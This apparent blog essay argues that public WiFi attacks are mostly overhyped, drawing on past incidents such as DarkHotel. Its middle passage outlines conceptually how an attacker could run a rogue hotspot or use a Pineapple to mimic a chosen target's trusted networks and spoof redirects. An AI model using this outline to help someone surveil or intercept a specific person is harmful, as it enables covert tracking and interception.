How to hack WiFi

The (in)security of public WiFi has been dividing opinions recently so here we'll explore what it actually takes to use WiFi as an attack vector, and what you get for your trouble.

WiFi is a local wireless network, does the attacker have to be local? Strictly speaking, no. While the wireless signals are local, the wireless router will inevitably be connected to the internet, meaning it is susceptible to remote compromise from any other internet-connected location.

The Mirai botnet used compromised routers to take down DynDNS and others around 2016 (Cloudflare article). The BlackTech APT group use compromised routers to traverse internal corporate networks (joint advisory). Though neither of these attacks sought to use their control over the router to affect local users of the routers.

The DarkHotel APT group used compromised hotel WiFi to deliver malware in 2014 (Kaspersky research report). While it hasn’t been made clear how they initially compromised the hotels, it's reasonable to assume that this was remote activity given they also appeared to have access to check-in information, more than just the local WiFi network. DarkHotel quickly changed up their MO and a similar technique hasn't been observed before or since.

This was at a time when around half of all websites didn't use HTTPS at all, SSL3.0 was still widely used, TLS1.3 didn't yet exist, and HSTS was in its infancy with less than 1% adoption. Even with all of that to their advantage the attackers only used their rogue WiFi to deliver a malware dropper, something that can be achieved far more easily through various other well established methods. There's no indication that they sought to observe or affect the web traffic of their targets.

That DarkHotel used kernel-level keyloggers and zero-days, were precise in their targeting of high level figures in the nuclear and defence sectors, and had intimate knowledge of travel plans strongly suggests government-backed actors. If an adversarial nation state is genuinely part of your threat model then perhaps don't take advice from social media on how best to protect yourself.

Ok, so remote attacks are possible but not really plausible? It certainly seems that way, so let's focus on local attacks. This introduces challenges for attackers; they need to be physically local. Sure they could leave behind a jump-box of sorts and access that remotely, but that still needs initial physical presence and leaves behind a physical device. This incurs cost and increases the chances of detection, both things that an attacker would want to minimise.

Let's assume I'm ok with those risks. What can I do? You could join an existing WiFi hotspot and eavesdrop on other people using the same hotspot. But, WPA3 encrypts all traffic with encryption keys unique to each connected device, so that's not really feasible. WPA2 is still widely used though, and a protocol exploit called KRACK (Key Reinstallation AttaCK) has been uncovered by researchers. This hasn't been seen in the wild, probably because the risk/reward doesn't stack up.

You could create a rogue WiFi hotspot like Coffee_Shop_Free_WiFi and wait for people to connect. This would allow you to not only eavesdrop but also to manipulate people's activity, such as redirecting web requests. You'll need to deploy your own WiFi router with a power supply (battery power isn't going to last very long).

In both cases, you're going to be limited by the fact that the vast majority of web traffic will be over HTTPS. Eavesdropping would allow you to see visited websites but not much else. Redirecting web requests to a spoofed website is going to throw up Untrusted or Insecure warnings so is quite likely to be noticed. You're also limited in that you have no control over who will connect to the hotspot or what they'll do while connected. You're going to be inundated with mountains of worthless junk data belonging to random unknown strangers.

That hardly sounds worthwhile. Can I not target someone specific? Sure you could. We've already assumed that you can be physically proximate with a device and power, so let's turn that router into a Pineapple. You have a target in mind, so you have an idea of their whereabouts. With a Pineapple you can identify what WiFi networks their device has previously connected to, not just public free WiFi, but home and office networks as well. The Pineapple can then mimic one of those known trusted networks and the device will connect automagically.

You still need to overcome the HTTPS problem, but maybe metadata would be intrinsically more valuable where it’s tied to a known person. Or you can be more cunning with the spoofed redirects knowing your intended victim.

Would a VPN help protect people against any of this? Maybe. Maybe not. A VPN connects your device to a remote gateway, but it can't reach that gateway until has a network connection, so the VPN needs to be suspended in order to first connect to WiFi - doubly so if there's a sign-in portal - so there's a window of opportunity that can be exploited. Background services like app-updaters will routinely call home as soon as they detect a network connect (DarkHotel used a malicious Adobe update package).

Even omitting that initial window of opportunity, it depends on the configuration of the VPN as to whether it permits local network traffic or protects DNS queries. For corporate devices this is likely managed by (assumed) competent IT administrators, but this is not a trivial undertaking for your average computer user. With all that in mind, if mere knowledge of the nature of the websites you're visiting is likely to be detrimental then perhaps consult a lawyer instead of LinkedIn.

?

So in a nutshell, if you're worried about being compromised over WiFi, your best defence is to avoid using known, trusted hotspots. The techniques and risks are just the same for an attacker but the payoff is substantially higher, making it the more plausible scenario. If you think all of this is still a viable concern and you want to keep safe by only using tethered mobile data, don't look up Stingray cell-site simulators.